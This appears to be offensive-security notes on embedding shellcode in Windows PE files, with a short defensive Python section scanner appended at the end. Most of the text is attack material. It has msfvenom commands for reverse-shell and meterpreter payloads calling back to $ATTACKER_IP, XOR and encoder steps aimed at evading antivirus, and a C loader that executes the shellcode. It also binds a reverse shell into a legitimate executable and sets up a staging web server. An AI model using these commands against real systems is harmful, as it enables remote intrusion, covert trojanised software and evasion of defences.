# PE Shellcode

## General PE Information

* [PE structure](../../../reverse engineering/windows/portable-executable.md)

## Inserting Shellcode

Multiple sections inside the PE can be used to hold the shellcode. Which section ends up holding it depends on how the shellcode variable is initialized. When the shellcode is defined as

* a __local variable__ inside the main function, it is stored in the `.text` section
* a __global variable__, it is stored in the `.data` section
* a __raw binary__ inside an icon image that is referenced from the code, it is stored in the `.rsrc` section
* a __custom data section__, it is stored in that unusual section

## Crafting Shellcode

* Use msfvenom to generate shellcode which executes the calculator

```sh
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c
```

* Fill in the missing parts to make it a valid C file (`windows.h` provides `DWORD`, `VirtualProtect` and `PAGE_EXECUTE_READ`)

```sh
sed -i '1s/^/#include <windows.h>\n/' stage.c
sed -i 's/=/= {/' stage.c
sed -i 's/;/};/' stage.c
echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c
```

* Compile it

```sh
i686-w64-mingw32-gcc stage.c -o vcalc.exe
```

### Compile C#

The Microsoft Visual C# compiler is called via

```sh
csc file.cs
```

## Staged C2

* The stage on the target needs to download the further parts of the shell into memory
* These parts may be generated in one of the following ways (all of them will be detected by AV)

```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe
```

* Generate a certificate for the webserver

```sh
openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes
```

* Start the webserver

```sh
sudo python -c "import http.server, ssl;server_address=('0.0.0.0',443);httpd=http.server.HTTPServer(server_address,http.server.SimpleHTTPRequestHandler);httpd.socket=ssl.wrap_socket(httpd.socket,server_side=True,certfile='webserver.pem',ssl_version=ssl.PROTOCOL_TLSv1_2);httpd.serve_forever()"
```

## Generate Custom Shellcode

* The goal is to bypass the AV

### Xor and Encode

```sh
msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp
```

* Xor and encode the payload; decode the payload on the target before it is executed

### Packer

* Compresses and obfuscates the shellcode inside a binary
* Obviously, an unpacker is needed inside the binary in addition to the packed code
* [mkaring's ConfuserEx](https://github.com/mkaring/ConfuserEx)
  * Select the directory and binary
  * Go to Settings, use the packer and create rules
  * Edit the rule as well
  * Go to Protect and click the button

### Binding

* Used to merge binaries
* The shellcode is merged into a legitimate PE and runs as an additional thread

```sh
msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe
```

* Bound PEs need some disguising as well

## Tools & Tips

* [hasherezade's PE-bear](https://github.com/hasherezade/pe-bear-releases.git) gives an overview of the PE's sections
* [asmtutor.com](https://asmtutor.com)
* [mvelazc0's staged payload](https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab2/2.cs)
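PE-bear shows the section overview interactively; the following Python script, added here as an example and not part of these notes or of any of the tools above, walks the section table itself and flags the carriers described under Inserting Shellcode: a non-standard section name, or a section that is both writable and executable. The PE image it parses is a constructed header-only fixture with no real code.

```python
import struct

# PE section characteristic bits (PE/COFF specification)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Section names a normal MinGW/MSVC build is expected to produce
COMMON_SECTIONS = {".text", ".data", ".rdata", ".rsrc", ".reloc", ".idata", ".bss", ".pdata", ".tls"}

def parse_sections(image: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table; return [(name, flags)]."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Flags
    _, num_sections, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + size_opt  # section table follows the optional header
    sections = []
    for i in range(num_sections):  # each IMAGE_SECTION_HEADER is 40 bytes
        entry = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        sections.append((entry[0].rstrip(b"\0").decode("ascii", "replace"), entry[9]))
    return sections

def suspicious_sections(image: bytes):
    """Flag sections worth a closer look: non-standard names or writable+executable flags."""
    findings = []
    for name, flags in parse_sections(image):
        reasons = []
        if name not in COMMON_SECTIONS:
            reasons.append("non-standard section name")
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable and executable")
        if reasons:
            findings.append((name, reasons))
    return findings

def build_sample_image(sections):
    """Constructed fixture: a bare PE header carrying the given section table, no real code."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0x0022)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    0x200, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections))
    return dos + b"PE\0\0" + coff + table

# Constructed sample: ordinary .text (RX) and .data (RW) plus a custom RWX section
SAMPLE = build_sample_image([(".text", 0x60000020), (".data", 0xC0000040), (".shell", 0xE0000040)])
```

Pointing `parse_sections` at the bytes of a real file gives the same overview PE-bear shows; a section like `.shell` in the sample is the kind of entry a triage script should surface.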